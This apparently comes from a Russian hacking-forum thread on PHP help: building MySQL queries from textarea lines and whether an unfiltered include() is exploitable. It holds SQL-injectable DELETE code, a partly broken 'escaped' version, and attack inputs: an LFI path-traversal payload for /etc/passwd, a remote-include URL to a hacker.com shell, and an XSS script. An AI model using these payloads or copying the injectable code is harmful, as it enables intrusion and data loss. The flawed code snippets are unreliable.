проьбовал точно также.... это и есть кусок кода.. до этого просто вывожу список файлов в папке.. все ok.. print_r($files); -- ok тоже самое....
include "./include/$files[$id]"; - так неправильно, массив если в двойных кавычках, то только в {}, или как у art2222 плюс чо это за инклуд такой в цикле?О_о
есть textarea (html) В нем текст такого вида :Alex: -Nikolay- +Rikko+ и т.д. (не знаю скоко таких записей) нужно чтобы все эти слова (до единого) выполнили запрос к mysql ........ WHERE name='строка' думаю поняли для начало просто запрос чтобы выполнял (ниче не выводил)
передаешь значение текстари формой скрипту, потом PHP: $a = explode('\n', $_POST['textarea']); $query = 'select ..... where '; foreach($a =>$zn) { $a .= "name='$zn' or"; } как то так.
ну или например так: PHP: <?php $arr = explode("\n", $_POST['textarea']); foreach ($arr as $text) mysql_query("DELETE FROM users WHERE name = '$text'"); ?> От sql-inj сам насочиняй что-нибудь) 2Krist_ALL \n в двойных кавычках надо указывать.
Для защиты от скули можно юзать ф-ю mysql_escape_string() Пример: PHP: <?php $arr = explode("\n", $_POST['textarea']); foreach ($arr as $text) mysql_query("DELETE * FROM users where name='".mysql_escape_string($text)."'";$result = mysql_query($query); ?> Вроде так, писал на быструю руку...
Скажите пожалуйста, где можно найти список всех браузеров с точными версиями, мне это надо для сокетов. Например Code: 'user_agent' => 'Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9) Gecko/2008061015 Firefox/3.0
допустим на сайте есть такой код: Code: include("page".$GET['id'].".php"); Причём id ничём не фильтруется. Может ли это привести к плачевным последствиям?
Нет, это безопасно Главное , что у тебя не было важных файлов, которые начинались с page*.php. Можно будет приинклудить любой файл начинающийся с "page" А если у тебя будет папка "page" ,ТО это тоже даст свои плоды : $GET['id']=/admin include("page".$GET['id'].".php") В итоге получится приинклудится "page/admin.php"
Подскажите функцию которая определяет есть ли кусочек слова (к примеру в $_GET['my_get'])(не путайте с проверкой целой части слов) Если есть кусочек слова то выводил что нибуть зы Pashkela тоже интересно насчет XSS
Ну вот тут почитайте, например: http://www.virtuax.be/fztr/index.php?title=XSS_Intraframe_Logger и тут кое-что: http://securityvulns.ru/Tdocument29.html а также LFI (PHP-inj): http://n0ns3ns3.livejournal.com/219202.html (ctrl+f "include")
Мы хотели пример на данном куске кода выше, который показа nilux /index.php?page=http://hacker.com/shell.php). В скрипте nilux`не проинклудилось бы
2 DDoSька: это врядли можно продемонстрировать полноценно, когда выложено только: PHP: include("page".$GET['id'].".php"); Чтобы понять, что тут КОНКРЕТНЫЙ LFI, просто прочтите то, чему вы поверите: http://forum.antichat.ru/thread23501.html и не надо меня впредь просить искать уязвимость в коде: PHP: $a = $a+1; остальной код (скрытый) имеет значение, для демонстрации уязвимости, когда просят именно так - "нет ты скажи, как именно здесь можно всё похерить" а я не говорил о RFI, тут LFI, что очень часто достаточно т.е. например: /index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd%00 очень даже просто могло бы, при определенных обстоятельствах, дать свои плоды
/index.php?page="><script>alert(xss)</script> так лучше? Просто кому XSS нужен, когда LFI есть ../ - означает подняться на один уровень выше, вообще-то, неважно, в какой папке ты сейчас